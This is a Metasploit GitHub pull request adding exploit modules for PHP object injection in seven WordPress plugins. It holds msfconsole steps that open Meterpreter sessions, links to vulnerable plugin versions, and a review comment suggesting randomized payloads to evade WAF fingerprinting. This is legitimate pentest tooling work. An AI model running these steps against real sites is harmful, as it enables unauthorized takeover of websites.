Add exploit modules for multiple PHP object injection vulnerabilities in various WordPress plugins #8006

Open: wants to merge 28 commits into base: master

5 participants
@ykoster
Contributor

ykoster commented Feb 24, 2017

These modules exploit multiple unauthenticated PHP object injection vulnerabilities in various WordPress plugins. Targets WordPress 3.4 - 4.x (tested on WordPress 4.5.3 - 4.7.2).

Affected plugins

Google Forms < 0.91
Ecwid Ecommerce Shopping Cart < 4.4.4
CMS Commander Client < 2.22
InfiniteWP Client < 1.6.1.1
Analytics Stats Counter Statistics (not fixed)
YITH WooCommerce Compare < 2.1.0
Google Analytics Counter Tracker < 3.5.1

Verification

Make sure you're running a WordPress site with one of the affected plugins installed & activated.

Google Forms < 0.91

https://sumofpwn.nl/download/wpgform.0.84.zip

  • Start msfconsole
  • use exploit/multi/http/wp_google_forms_unserialize
  • set RHOST <ip target site>
  • set TARGETURI <WordPress path>
  • set LHOST <ip of FTP service>
  • optionally set RPORT, SSL, and VHOST
  • exploit
  • Verify a new Meterpreter session is started

Ecwid Ecommerce Shopping Cart < 4.4.4

Requires (free) registration & activation @ Ecwid

https://sumofpwn.nl/download/ecwid-shopping-cart.4.4.zip

  • Start msfconsole
  • use exploit/multi/http/wp_ecwid_shopping_cart_unserialize
  • set RHOST <ip target site>
  • set TARGETURI <WordPress path>
  • set LHOST <ip of FTP service>
  • optionally set RPORT, SSL, and VHOST
  • exploit
  • Verify a new Meterpreter session is started

CMS Commander Client < 2.22

https://sumofpwn.nl/download/cms-commander-client.2.21.zip

  • Start msfconsole
  • use exploit/multi/http/wp_cms_commander_client_unserialize
  • set RHOST <ip target site>
  • set TARGETURI <WordPress path>
  • set LHOST <ip of FTP service>
  • optionally set RPORT, SSL, and VHOST
  • exploit
  • Verify a new Meterpreter session is started

InfiniteWP Client < 1.6.1.1

https://sumofpwn.nl/download/iwp-client.zip

  • Start msfconsole
  • use exploit/multi/http/wp_infinitewp_client_unserialize
  • set RHOST <ip target site>
  • set TARGETURI <WordPress path>
  • set LHOST <ip of FTP service>
  • optionally set RPORT, SSL, and VHOST
  • exploit
  • Verify a new Meterpreter session is started

Analytics Stats Counter Statistics

https://sumofpwn.nl/download/stats-counter.zip

  • Start msfconsole
  • use exploit/multi/http/wp_analytics_stats_counter_statistics_unserialize
  • set RHOST <ip target site>
  • set TARGETURI <WordPress path>
  • set LHOST <ip of FTP service>
  • optionally set RPORT, SSL, and VHOST
  • exploit
  • Verify a new Meterpreter session is started

YITH WooCommerce Compare < 2.1.0

Requires WooCommerce

https://sumofpwn.nl/download/yith-woocommerce-compare.2.0.9.zip
https://sumofpwn.nl/download/woocommerce.2.6.1.zip

  • Start msfconsole
  • use exploit/multi/http/wp_yith_woocommerce_compare_unserialize
  • set RHOST <ip target site>
  • set TARGETURI <WordPress path>
  • set LHOST <ip of FTP service>
  • optionally set RPORT, SSL, and VHOST
  • exploit
  • Verify a new Meterpreter session is started

Google Analytics Counter Tracker < 3.5.1

https://sumofpwn.nl/download/analytics-counter.zip

  • Start msfconsole
  • use exploit/multi/http/wp_google_analytics_counter_tracker_unserialize
  • set RHOST <ip target site>
  • set TARGETURI <WordPress path>
  • set LHOST <ip of FTP service>
  • optionally set RPORT, SSL, and VHOST
  • exploit
  • Verify a new Meterpreter session is started

Yorick Koster and others added some commits Nov 8, 2016

Add files via upload
This module exploits multiple PHP object injection vulnerabilities affecting various WordPress plugins. Targets WordPress 3.4 - 4.x (tested on WordPress 4.5.3 - 4.7.2)
Update wp_plugins_unserialize.rb
Fix formatting warnings
Update wp_plugins_unserialize.rb
Removed nBill Lite reference, fixed indices
@wchen-r7

Contributor

wchen-r7 commented Feb 24, 2017

I think this module needs to be broken down into separate modules.

@ykoster

Contributor

ykoster commented Feb 24, 2017

@wchen-r7 split in separate modules :)

ykoster added some commits Feb 25, 2017

@ykoster ykoster changed the title from Add exploit module for multiple PHP object injection vulnerabilities affecting various WordPress plugins to Add exploit modules for multiple PHP object injection vulnerabilities in various WordPress plugins Feb 25, 2017

ykoster added some commits Feb 25, 2017

@ykoster

Contributor

ykoster commented Apr 21, 2017

FYI, the POP chain still works in WordPress 4.7.4, which was released yesterday

'method' => 'POST',
'uri' => target_uri.path,
'vars_post' => {
  'wpadm_stat_request' => '=YToxOntpOjA7czo0OiJ0ZXN0Ijt9'

@jvoisin

jvoisin May 2, 2017

Contributor

Please encode at runtime, with something like Base64.encode64('a:1:{i:0;s:4:"test";}')

@jvoisin

jvoisin May 2, 2017

Contributor

It could also be interesting to not hardcode the test string, but to use a random one, to bypass idiotic WAF that will fingerprint YToxOntpOjA7czo0OiJ0ZXN0Ijt9.

@jrobles-r7 jrobles-r7 self-assigned this Nov 16, 2018
